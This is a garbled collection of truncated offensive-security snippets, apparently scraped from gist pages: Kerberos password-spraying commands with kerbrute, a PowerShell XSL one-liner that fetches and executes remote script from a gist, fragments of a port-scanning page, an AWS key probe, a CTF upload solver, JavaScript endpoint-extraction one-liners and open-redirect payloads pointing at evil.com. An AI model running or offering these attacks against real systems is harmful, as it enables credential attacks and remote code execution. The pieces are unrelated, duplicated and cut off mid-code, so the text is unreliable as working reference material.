With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
############################################################################## | |
### Powershell Xml/Xsl Assembly "Fetch & Execute" | |
### [https://twitter.com/bohops/status/966172175555284992] | |
$s=New-Object System.Xml.Xsl.XsltSettings;$r=New-Object System.Xml.XmlUrlResolver;$s.EnableScript=1;$x=New-Object System.Xml.Xsl.XslCompiledTransform;$x.Load('https://gist.githubusercontent.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/f8245f99992eff00eb5f0d5738dfbf0937daf5e4/xsl-notepad.xsl',$s,$r);$x.Transform('https://gist.githubusercontent.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/f8245f99992eff00eb5f0d5738dfbf0937daf5e4/xsl-notepad.xml','z');del z; | |
############################################################################## | |
### Powershell VBScript Assembly SCT "Fetch & Execute" | |
### [https://twitter.com/bohops/status/965670898379476993] |
==== bash ==== | |
# bash # | |
## Setiing PATH ## | |
$ echo ''' | |
# bash''' >> ~/.bash_profile | |
$ echo 'export BASH_SILENCE_DEPRECATION_WARNING=1' >> ~/.bash_profile |
import httplib | |
import urllib | |
http = httplib.HTTPSConnection('example.com', 443) | |
cookie = 'your=cookies'; | |
http.request("GET", "/api/v1/csrf", "", { | |
'user-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36', | |
'referer': 'https://example.com/', |
<body> | |
<style>pre { white-space: inherit }</style> | |
<pre id="log"></pre> | |
<div id="ports" style="visibility: hidden; height: 0; width: 0;"></div> | |
<iframe src="about:blank" name="x" id="x" style="display: none;"></iframe> | |
</body> | |
<script> | |
var electrum = { | |
logbreak: function() { e = document.createElement('br'); document.getElementById('log').appendChild(e); }, | |
log: function(s) { e = document.createElement('span'); e.innerText = s+" "; document.getElementById('log').appendChild(e); }, |
#!/bin/bash | |
# Written by Frans Rosén (twitter.com/fransrosen) | |
_debug="$2" #turn on debug | |
_timeout="20" | |
#you need a valid key, since the errors happens after it validates that the key exist. we do not need the secret key, only access key | |
_aws_key="AKIA..." | |
H_ACCEPT="accept-language: en-US,en;q=0.9,sv;q=0.8,zh-TW;q=0.7,zh;q=0.6,fi;q=0.5,it;q=0.4,de;q=0.3" | |
H_AGENT="user-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36" |
#!/usr/bin/env python | |
# encoding:utf-8 | |
# Author : WangYihang | |
# Date : 2017/10/03 | |
# Email : wangyihanger@gmail.com | |
# Comment : to solve XDCTF-2017-WEB-Upload | |
import string | |
import itertools | |
import os |
curl -L -k -s https://www.example.com | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?\s*[=:]\s*['\"]?[^'\"]+.js[^'\"> ]*" | awk -F '//' '{if(length($2))print "https://"$2}' | sort -fu | xargs -I '%' sh -c "curl -k -s \"%\" | sed \"s/[;}\)>]/\n/g\" | grep -Po \"(['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})|(\.(get|post|ajax|load)\s*\(\s*['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})\"" | awk -F "['\"]" '{print $2}' | sort -fu | |
# using linkfinder | |
function ejs() { | |
URL=$1; | |
curl -Lks $URL | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?\s*[=:]\s*['\"]?[^'\"]+.js[^'\"> ]*" | sed -r "s/^src['\"]?[=:]['\"]//g" | awk -v url=$URL '{if(length($1)) if($1 ~/^http/) print $1; else if($1 ~/^\/\//) print "https:"$1; else print url"/"$1}' | sort -fu | xargs -I '%' sh -c "echo \"\n##### %\";wget --no-check-certificate --quiet \"%\"; basename \"%\" | xargs -I \"#\" sh -c 'linkfinder.py -o cli -i #'" | |
} | |
# with file download (the new best one): | |
# but there is a bug if you don't provide a root url |
var logger = console.trace; | |
// ELEMENT | |
;(getElementByIdCopy => { | |
Element.prototype.getElementById = function(q) { | |
logger('getElementById', q, this, this.innerHTML); | |
return Reflect.apply(getElementByIdCopy, this, [q]) | |
} | |
})(Element.prototype.getElementById) |
Simply try to change the domain
Example: ?redirect=https://example.com --> ?redirect=https://evil.com
Bypass the filter when protocol is blacklisted using //
Example: ?redirect=https://example.com --> ?redirect=//evil.com